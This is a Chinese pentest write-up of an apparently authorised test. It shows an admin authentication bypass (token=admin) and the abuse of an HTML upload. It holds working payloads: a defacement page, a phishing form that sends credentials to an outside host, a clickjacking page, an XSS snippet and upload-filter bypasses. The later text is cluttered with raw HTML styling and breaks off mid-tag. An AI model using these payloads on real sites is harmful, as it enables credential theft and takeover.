寫在前面

這篇文章主要是通過前端JS來尋找接口進行測試，尋找漏洞成功進入后臺后，進行后臺文件上傳html。僅供學習。

過程

前端JS進入后臺

某日拿到授權站點，開始漫長的信息收集……

收集了許久，找到了一個后臺，可惜用了許多方法都無法滲透進去。就在一籌莫展之際，突然想到了一些師傅通過前端JS尋找接口的騷操作，這里開始躍躍欲試。F12點擊Sources，成功尋找到了userlogin.js。開始了一波小審計后，審計到了一些接口并進行測試訪問，得到了些許收獲：

本來正常訪問后臺http://x.x.x.x/admin/login.action登陸的時候，不僅需要用戶名和密碼，還需要驗證碼，這樣就無法進行暴力破解：

可是這里找到了該接口：/admin/adminlogin.action，訪問后驗證碼居然消失了，登陸只需要用戶名和密碼，那么這里便可以直接暴力破解了：

還收獲了兩個接口，其中存在有參數jsoncallback，這里便可能存在jsonp劫持、jsonp注入以及xss等等漏洞了。

還有一處接口，則是/web/weblogin.action?token=。token是服務端生成的一串字符串，以作客戶端進行請求的一個令牌，當第一次登錄后，服務器生成一個token便將此token返回給客戶端，以后客戶端只需帶上這個Token前來請求數據即可，無需再次帶上用戶名和密碼。所以這里token值將會被記錄到cookie里，而其可以用來辨別用戶身份信息，再加上之前有碰到過直接在cookie中存儲明文數據的情況，抱著碰碰運氣的想法，這里直接在其后面寫上admin，即/web/weblogin.action?token=admin，沒想到竟意外成功登錄進后臺，且是超級管理員權限。

這里為了驗證剛才的想法是否是正確的，便按下F12查看Application中的cookie值：

確實如此。哈哈，運氣也太好了~

驗證過后，這里點擊切換賬號，發現還有幾個用戶但是切換過去需要密碼：

這里隨機選中其中一個用戶：

看到其用戶名稱為xxx，用戶代碼為180***，這里便測試將token的值從admin分別修改為用戶名稱xxx和用戶代碼180***，都可以直接成功切換為該用戶了：

依次測試，最后都能成功，故使token值為用戶名稱或者用戶代碼，最后均可直接登陸為該用戶。

后臺文件上傳html

前面成功進入了后臺，還是超級管理員權限，那么這里就來找找有沒有可利用的文件上傳的點。這里找了好幾個，別說服務器端腳本木馬了，就連html、htm這種后綴都不能上傳。最后找到了一個也只可以上傳html、htm這種后綴。那么這里可以利用的點就是文件上傳xss、上傳點擊劫持頁面、掛黑頁等危害了。

這里先來簡單介紹下吧：

介紹

文件上傳漏洞是一個很經典的漏洞，同時也十分的嚴重。文件上傳漏洞通常由于代碼中對文件上傳功能所上傳的文件過濾不嚴或web服務器相關解析漏洞未修復而造成的，如果文件上傳功能代碼沒有嚴格限制和驗證用戶上傳的文件后綴、類型等，攻擊者可通過文件上傳點上傳任意文件，包括網站后門文件（webshell）控制整個網站。

那么這里來講講文件上傳漏洞上傳html文件并解析的問題。

文件上傳漏洞上傳html文件

文件上傳漏洞中我們一般都是上傳對應網站能解析的服務器文件木馬，比如php、asp、jsp等等后綴文件木馬，以此達到控制整個網站的目的。但是現在很多網站都對文件上傳漏洞上傳木馬防的很死，讓我們無法下手。那么這時，我們也可以來通過上傳html文件來擴大我們的攻擊面。這里來介紹幾種方法：

掛黑頁

相信有炫技經驗的師傅們一定可以想到，當我們在某個網站不能成功GetShell的時候，而又想要通過某種方法從而來達到炫技的目的，那么使用的方法是什么呢？沒錯，那就是掛黑頁，一般使用的是CSS層疊樣式表。

代碼：

<html>
<head>
<meta charset="UTF-8">
head>
<table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;">
<tbody>
<tr>
<td style="color:#FFFFFF;z-index: 6000;vertical-align:top;">
<h1>hacked by Johnson666h1>
td>
tr>
tbody>
table>
html>

效果：

是不是還挺有成就感~

這里如果開頭加上了，字會到下一行，看自己的需求吧：

制作form表單釣魚攻擊頁面

除了可以炫技來掛黑頁以外，CSS層疊樣式表可以做的東西還有很多，比如說這個form表單釣魚攻擊頁面：

代碼：

<html>
<head>
<meta charset="UTF-8">
head>
<table+style="left:+0px;+top:+0px;+position:+fixed;z-index:+5000;position:absolute;width:100%;background-color:white;">
<tr>
<td>
<form action="http://192.168.1.6/diaoyu/404.html" method="post">
賬號：<input type="text" name="username"><br>
密碼：<input type="password" name="password"><br>
<input type="submit" value="登錄" name="Login">
form>
td>
tr>
table>
html>

效果：

隨便輸入賬號密碼，點擊登錄，跳轉到了404界面：

制作點擊劫持頁面

點擊劫持(ClickJacking)是一種視覺欺騙攻擊手段，在web端就是iframe嵌套一個透明不可見的頁面，讓用戶在不知情(被欺騙)的情況下，點擊攻擊者想要欺騙用戶點擊的位置。這種攻擊利用了HTML中標簽的透明屬性。就像一張圖片上面鋪了一層透明的紙一樣，你看到的是黑客的頁面，但是其實這個頁面只是在底部，而你真正點擊的是被黑客透明化的另一個網頁。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">其中很多屬性的解釋在代碼中有用注釋標明了。那么這里來講講其中沒有注釋的CSS中的position的屬性。看如下這張圖：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042227" data-ratio="0.5177725118483413" data-s="300,640" data-type="png" data-w="844" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCURymVbfSABpX4KNlNicrpJpvWZV2C16jUgDyzLDlQYUmTvRmuCYDodA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">制作代碼：<pre style="margin-top: 15px;margin-bottom: 15px;padding: 2px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;overflow-wrap: break-word;background-color: rgb(248, 248, 248);border: 1px solid rgb(204, 204, 204);border-top-left-radius: 3px;border-top-right-radius: 3px;border-bottom-right-radius: 3px;border-bottom-left-radius: 3px;overflow: auto;color: rgb(81, 81, 81);font-size: 14px;text-align: start;box-sizing: border-box !important;word-wrap: break-word !important;"><code style="padding: 0.5em;outline: 0px;max-width: 100%;overflow-wrap: break-word;font-family: Consolas, Monaco, "Andale Mono", monospace;display: block;overflow-x: auto;background-color: rgb(35, 36, 31);color: rgb(248, 248, 242);border: 0px;box-sizing: border-box !important;word-wrap: break-word !important;"><!DOCTYPE html> <html> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <head> <title>點擊劫持制作</title> <style> iframe { width: 1920px; height: 1200px; position: absolute; top: 0px; left: 0px; z-index: 2; //設置元素的堆疊順序。擁有更高堆疊順序的元素總是會處于堆疊順序較低的元素的前面。簡單的說就是利用這個屬性可以把一段文字置于一張圖片之上,或者把圖片置于文字之上,只要設置好合適的優先級就可以了 /*控制不透明度的屬性，兼容各大瀏覽器*/ filter: alpha(Opacity=0); /*提供給IE瀏覽器8之前的*/ -moz-opacity: 0; /*提供給火狐瀏覽器的*/ -webkit-opacity: 0; /*提供給webkit內核的*/ -khtml-opacity: 0; /*提供給KHTML內核的*/ -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)"; /*提供給IE8之后的*/ opacity: 0; /*控制不透明度的屬性，兼容各大瀏覽器*/ } button { position: absolute; top: 345px; /*元素的頂部邊緣,定義了一個定位元素的上外邊距邊界與其包含塊上邊界之間的偏移*/ left: 933px; /*元素的左邊緣,定義了定位元素左外邊距邊界與其包含塊左邊界之間的偏移*/ z-index: 0; /*設置元素的堆疊順序。擁有更高堆疊順序的元素總是會處于堆疊順序較低的元素的前面。簡單的說就是利用這個屬性可以把一段文字置于一張圖片之上,或者把圖片置于文字之上,只要設置好合適的優先級就可以了*/ width: 52.5166px; height: 20.8px; } </style> </head> <body> <button style='font-size:7px'>點擊脫衣</button> <img src="http://pic1.win4000.com/wallpaper/2018-03-19/5aaf2bf0122d2.jpg"> <iframe src="http://127.0.0.1/bachang/dvwa" scrolling="no"></iframe> /*用scrolling="no"使內嵌的網頁不能滾動*/ </body> </html></code></pre><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">結果：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042228" data-ratio="0.4994124559341951" data-s="300,640" data-type="png" data-w="851" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCG3jDiaia6yibXhW3cN5pRQMG6TaYoPIaiaic6g1bm4nbjGIeaiaoIvfymrIQ/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">把其中iframe的opacity屬性調成0.5，這樣就能看出來下面其實是dvwa的登陸界面，而按鈕對應的位置正好是dvwa的登陸按鈕：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042229" data-ratio="0.4671361502347418" data-s="300,640" data-type="png" data-w="852" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCIXaBtTMhiaj98u4EmYwtKZuNWnzun1Y1WrWHhDM6DO7OMqwwibhJMTWQ/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這里可以自行替換成別的頁面，比如點擊跳轉等等，就能起到更多更好的劫持的效果了。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h4 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">文件上傳XSS</h4><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">文件上傳的XSS一般都是上傳html文件導致的XSS。一般使用的后綴名是htm后綴或者html后綴。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> 代碼:<pre style="margin-top: 15px;margin-bottom: 15px;padding: 2px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;overflow-wrap: break-word;background-color: rgb(248, 248, 248);border: 1px solid rgb(204, 204, 204);border-top-left-radius: 3px;border-top-right-radius: 3px;border-bottom-right-radius: 3px;border-bottom-left-radius: 3px;overflow: auto;color: rgb(81, 81, 81);font-size: 14px;text-align: start;box-sizing: border-box !important;word-wrap: break-word !important;"><code style="padding: 0.5em;outline: 0px;max-width: 100%;overflow-wrap: break-word;font-family: Consolas, Monaco, "Andale Mono", monospace;display: block;overflow-x: auto;background-color: rgb(35, 36, 31);color: rgb(248, 248, 242);border: 0px;box-sizing: border-box !important;word-wrap: break-word !important;"><html> <body> <img src=x onerror=alert(1)> </body> </html></code></pre><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">html后綴：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042231" data-ratio="0.22890625" data-s="300,640" data-type="png" data-w="1280" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCpHx2ftAzBIXXwdQ75mCtjhTWpn715ia7fLApyuM9d9olNPmF9MAicFxA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">htm后綴：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042230" data-ratio="0.29620661824051653" data-s="300,640" data-type="png" data-w="1239" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCib2RibFqQo30F2BuGvH2PXvMNodX2S65qBPicCclORRAG1fXkJOTTibwbg/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h5 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">一些簡單的繞過方式：</h5><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">1.后綴中加上空格：</h6><h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"></h6><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">比如ht m后綴：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042232" data-ratio="0.306873977086743" data-s="300,640" data-type="png" data-w="1222" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfC4TZTCjrkd1U54o5A31rho53tskKOwhxyicfYGSKG7edKPYX9czKIPsg/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">ht ml后綴：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042233" data-ratio="0.24958949096880131" data-s="300,640" data-type="png" data-w="1218" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfC9v26QqIMckicpt8sz69tfkjP28lnq2MPsxiaibcWd3TC8ZxRgNOrWUTLA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">2.改成其他任意的不存在的后綴</h6><h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"></h6><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">比如pnga：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042234" data-ratio="0.28832406671961874" data-s="300,640" data-type="png" data-w="1259" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCfnjhZ5dLiabJVJibtcxxueGFT4k8Rc98ibXicJTQrDtTBSP2hA1jVbiaZicg/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">3.添加Gif89a頭部</h6><h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"></h6><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">其實這是GIF89a圖片欺騙攻擊。在服務器中的源代碼用getimagesize，mime_content_type,Fileinfo函數來獲取圖像信息，即檢查文件內容時，在開頭加GIF89a頭部，可以對這些函數起到欺騙攻擊。 如果驗證了圖片的內容，嘗試添加:Gif89a，進行GIF89a圖片欺騙攻擊。不過也有些限制。比如用了Gif89a頭：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042236" data-ratio="0.3715170278637771" data-s="300,640" data-type="png" data-w="646" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCyrcWUPKdn5AMrTwK5vVwnzUe8y4SFQPy4aTjDEn4w8ZlnuibNIzNlow/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 646px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">那么其后綴名必須得是htm,html這樣的規范后綴才能彈窗；而像ht m,ht ml或者隨便亂取的不存在的后綴就不會彈窗了:<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei 